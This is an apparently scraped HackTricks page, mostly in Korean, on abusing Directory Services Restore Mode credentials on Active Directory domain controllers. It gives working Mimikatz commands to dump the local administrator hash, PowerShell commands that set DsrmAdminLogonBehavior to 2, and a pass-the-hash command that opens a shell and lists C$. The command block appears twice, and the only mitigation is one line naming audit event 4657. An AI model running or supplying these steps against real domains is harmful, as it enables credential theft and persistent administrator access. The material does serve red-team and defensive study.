DSRM Credentials

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

DSRM 자격 증명

각 DC 내부에는 로컬 관리자 계정이 있습니다. 이 머신에서 관리자 권한을 가지면 mimikatz를 사용하여 로컬 관리자 해시를 덤프할 수 있습니다. 그런 다음 레지스트리를 수정하여 이 비밀번호를 활성화하여 이 로컬 관리자 사용자에 원격으로 접근할 수 있습니다. 먼저 DC 내부의 로컬 관리자 사용자 해시를 덤프해야 합니다:

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'

그런 다음 해당 계정이 작동하는지 확인해야 하며, 레지스트리 키의 값이 "0"이거나 존재하지 않는 경우 "2"로 설정해야 합니다:

Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior #Check if the key exists and get the value
New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD #Create key with value "2" if it doesn't exist
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2  #Change value to "2"

그런 다음, PTH를 사용하여 C$의 내용을 나열하거나 심지어 셸을 얻을 수 있습니다. 메모리에 있는 해시로 새로운 PowerShell 세션을 생성할 때 (PTH의 경우) 사용되는 "도메인"은 DC 머신의 이름일 뿐입니다:

sekurlsa::pth /domain:dc-host-name /user:Administrator /ntlm:b629ad5753f4c441e3af31c97fad8973 /run:powershell.exe
#And in new spawned powershell you now can access via NTLM the content of C$
ls \\dc-host-name\C$

더 많은 정보는 다음에서 확인할 수 있습니다: https://adsecurity.org/?p=1714 및 https://adsecurity.org/?p=1785

완화

이벤트 ID 4657 - HKLM:\System\CurrentControlSet\Control\Lsa DsrmAdminLogonBehavior의 감사 생성/변경

HackTricks 지원하기

구독 계획 확인하기!
**💬 Discord 그룹 또는 텔레그램 그룹에 참여하거나 Twitter 🐦 @hacktricks_live를 팔로우하세요.
HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 팁을 공유하세요.

PreviousDiamond Ticket NextExternal Forest Domain - OneWay (Inbound) or bidirectional

Last updated 4 months ago

DSRM 자격 증명

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'

그런 다음 해당 계정이 작동하는지 확인해야 하며, 레지스트리 키의 값이 "0"이거나 존재하지 않는 경우 "2"로 설정해야 합니다:

Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior #Check if the key exists and get the value
New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD #Create key with value "2" if it doesn't exist
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2  #Change value to "2"

sekurlsa::pth /domain:dc-host-name /user:Administrator /ntlm:b629ad5753f4c441e3af31c97fad8973 /run:powershell.exe
#And in new spawned powershell you now can access via NTLM the content of C$
ls \\dc-host-name\C$

완화

이벤트 ID 4657 - HKLM:\System\CurrentControlSet\Control\Lsa DsrmAdminLogonBehavior의 감사 생성/변경